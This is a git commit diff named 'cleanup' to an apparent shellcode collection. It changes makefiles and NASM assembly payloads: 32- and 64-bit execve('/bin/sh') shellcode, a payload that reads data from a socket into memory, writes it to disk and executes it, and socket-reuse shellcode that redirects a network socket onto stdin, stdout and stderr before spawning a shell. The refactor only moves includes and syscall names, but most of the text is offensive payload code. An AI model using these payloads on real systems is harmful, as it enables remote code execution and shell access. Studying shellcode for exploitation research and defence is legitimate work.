cleanup

Author: evanpjensen

32bitLocalBinSh/makefile

@@ -1,17 +1,22 @@
 #Evan Jensen
 #Make template for testing shellcode
+
+
+RUNTIMEDIR = ../include/runtime/
+INCLUDEDIR = ../include/
+INCLUDE    = -I $(INCLUDEDIR) -I $(RUNTIMEDIR)
+
 shellcode = shell32.s
 NFLAGS = elf
 CFLAGS = -m32 
 
 all: assemble link
 assemble:
-	nasm -f $(NFLAGS) $(shellcode) -o linkme.o
-	nasm $(shellcode) -o shellcode
+	nasm -f $(NFLAGS) $(shellcode) $(INCLUDE) -o linkme.o
+	nasm $(shellcode) $(INCLUDE) -o shellcode
 link:
 	gcc linkme.o -o testShellcode $(CFLAGS)
 
 clean:
-	rm linkme.o
-	rm testShellcode
-	rm shellcode
+	rm -f linkme.o testShellcode shellcode
+

32bitLocalBinSh/shell32.s

@@ -2,7 +2,7 @@
 ;; EBX, ECX, EDX, ESI, EDI, EBP then stack
 BITS 32
 global main
-	%include "../include/short32.s"
+	%include "short32.s"
 
 main:
 	; execve("/bin/sh", 0, 0)

32bitPutFileOnDisk/makefile

@@ -1,17 +1,22 @@
 #Evan Jensen
 #Make template for testing shellcode
+
+RUNTIMEDIR = ../include/runtime/
+INCLUDEDIR = ../include/
+INCLUDE    = -I $(INCLUDEDIR) -I $(RUNTIMEDIR)
+
 shellcode = shell32.s
 NFLAGS = elf
 CFLAGS = -m32 
 
 all: assemble link
 assemble:
-	nasm -f $(NFLAGS) $(shellcode) -o linkme.o
-	nasm $(shellcode) -o shellcode
+	nasm -f $(NFLAGS) $(shellcode) $(INCLUDE) -o linkme.o
+	nasm $(shellcode) $(INCLUDE) -o shellcode
 link:
 	gcc linkme.o -o testShellcode $(CFLAGS)
 
 clean:
-	rm linkme.o
-	rm testShellcode
-	rm shellcode
+	rm -f linkme.o testShellcode shellcode
+
+

32bitPutFileOnDisk/shell32.s

@@ -7,11 +7,11 @@
 BITS 32
 	global main
 	
-	%include "../include/syscalls32.s"
+	%include "short32.s"
 
 	%define openflags 0x42 ; O_CREAT|O_RDWR
 	%define size 0xffff
-
+	%define stackcookie [gs:0x14]
 
 	; assumption - ebx has the input (socket)
 		
@@ -35,7 +35,7 @@ main:
 	mov ebx, ebp 		; ebx = 0
 	mov edx, ebp  		
 	mov dl, 0x3 		; edx = 3
-	mov al, __NR_mmap
+	mov al, mmap
 	int 0x80 		; call mmap
 
 	; (temp assignment)
@@ -53,23 +53,22 @@ main:
 	mov edx, eax	
 	mov dl, 0x7
 	shl dl, 0x6		; edx = 111000000 = 0700
-	mov al, __NR_open 
+	mov al, open 
 	int 0x80 		; call open 
 
 	; write(output, buffer, size)
 	mov ebx, eax 		; ebx = output
 	mov ecx, edi 		; ecx = buffer
 	mov edx, esi 		; edx = size
 	xor eax, eax
-	mov al, __NR_write
+	mov al, write
 	int 0x80 		; call write 
 	
 	; execve(filename, 0, 0) 
 	mov ebx, esp 		; ebx = filename
 	xor ecx, ecx
 	mov edx, ecx
 	mov eax, ecx
-	mov al, __NR_execve
+	mov al, execve
 	int 0x80
 
-	

32bitSocketReuse/makefile

@@ -1,17 +1,20 @@
 #Evan Jensen
 #Make template for testing shellcode
+
+RUNTIMEDIR = ../include/runtime/
+INCLUDEDIR = ../include/
+INCLUDE    = -I $(INCLUDEDIR) -I $(RUNTIMEDIR)
 shellcode = shell32.s
 NFLAGS = elf
 CFLAGS = -m32 
 
 all: assemble link
 assemble:
-	nasm -f $(NFLAGS) $(shellcode) -o linkme.o
-	nasm $(shellcode) -o shellcode
+	nasm -f $(NFLAGS) $(shellcode) $(INCLUDE) -o linkme.o
+	nasm $(shellcode) $(INCLUDE) -o shellcode
 link:
 	gcc linkme.o -o testShellcode $(CFLAGS)
 
 clean:
-	rm linkme.o
-	rm testShellcode
-	rm shellcode
+	rm -f linkme.o testShellcode shellcode
+

32bitSocketReuse/shell32.s

@@ -3,7 +3,7 @@
 	;; Mon Mar  4 12:03:49 EST 2013
 	;; EBX, ECX, EDX, ??? then stack - but we only need 3		
 	;; read = 3, dup2 = 63, execve = 11
-	%include "../include/short32.s"
+	%include "short32.s"
 
 	%define MAGIC dword 0xcafef00d
 BITS 32
@@ -51,6 +51,8 @@ mydup2:
 	dec ecx    	; this is for looping stderr/out/in
 	jns mydup2.copy
 
+	
+
 	;; OUR SOCKET IS IN EBX
 	
 	;; now just some local shellcode

64BitLocalBinSh/makefile

@@ -1,17 +1,20 @@
 #Evan Jensen
 #Make template for testing shellcode
+
+RUNTIMEDIR = ../include/runtime/
+INCLUDEDIR = ../include/
+INCLUDE    = -I $(INCLUDEDIR) -I $(RUNTIMEDIR)
 shellcode = shell64.s
 NFLAGS = elf64
 CFLAGS = 
 
 all: assemble link
 assemble:
-	nasm -f $(NFLAGS) $(shellcode) -o linkme.o
-	nasm $(shellcode) -o shellcode
+	nasm -f $(NFLAGS) $(shellcode) $(INCLUDE) -o linkme.o
+	nasm $(shellcode) $(INCLUDE) -o shellcode
 link:
 	gcc linkme.o -o testShellcode $(CFLAGS)
 
 clean:
-	rm linkme.o
-	rm testShellcode
-	rm shellcode
+	rm -f linkme.o testShellcode shellcode
+

64BitLocalBinSh/shell64.s

@@ -2,16 +2,19 @@
 	;; Evan Jensen 64bit localshellcode
 	;; RDI, RSI, RDX, RCX, R8, and R9 then stack		
 BITS 64
+	
+%include "short64.s"
+	
 global main
-	extern execve
+
 main:
-	xor rax,rax
+	xor  rax, rax
 	push rax
-	mov rdi, 0x68732f2f6e69622f
+	mov  rdi, 0x68732f2f6e69622f ;/bin//sh
 	push rdi
-	mov al,59 		;execve in unistd_64.h
-	mov rdi,rsp
-	xor rsi,rsi
-	xor rdx,rdx
+	mov  al,  execve
+	mov  rdi, rsp
+	xor  rsi, rsi
+	xor  rdx, rdx
 	syscall
 

getsShellcode/getsShellcode.s

@@ -2,7 +2,7 @@
 	;; Evan Jensen (wont) 111012
 BITS 32
 	
-%include "../include/short32.s"
+%include "short32.s"
 	global main
 
 main:

getsShellcode/makefile

@@ -1,17 +1,20 @@
 #Evan Jensen
 #Make template for testing shellcode
+RUNTIMEDIR = ../include/runtime/
+INCLUDEDIR = ../include/
+INCLUDE    = -I $(INCLUDEDIR) -I $(RUNTIMEDIR)
+
 shellcode = getsShellcode.s
 NFLAGS = elf
 CFLAGS = -m32
 
 all: assemble link
 assemble:
-	nasm -f $(NFLAGS) $(shellcode) -o linkme.o
-	nasm $(shellcode) -o shellcode
+	nasm -f $(NFLAGS) $(shellcode) $(INCLUDE) -o linkme.o
+	nasm $(shellcode) $(INCLUDE) -o shellcode
 link:
 	gcc linkme.o -o testShellcode $(CFLAGS)
 
 clean:
-	rm linkme.o
-	rm testShellcode
-	rm shellcode
+	rm -f linkme.o testShellcode shellcode
+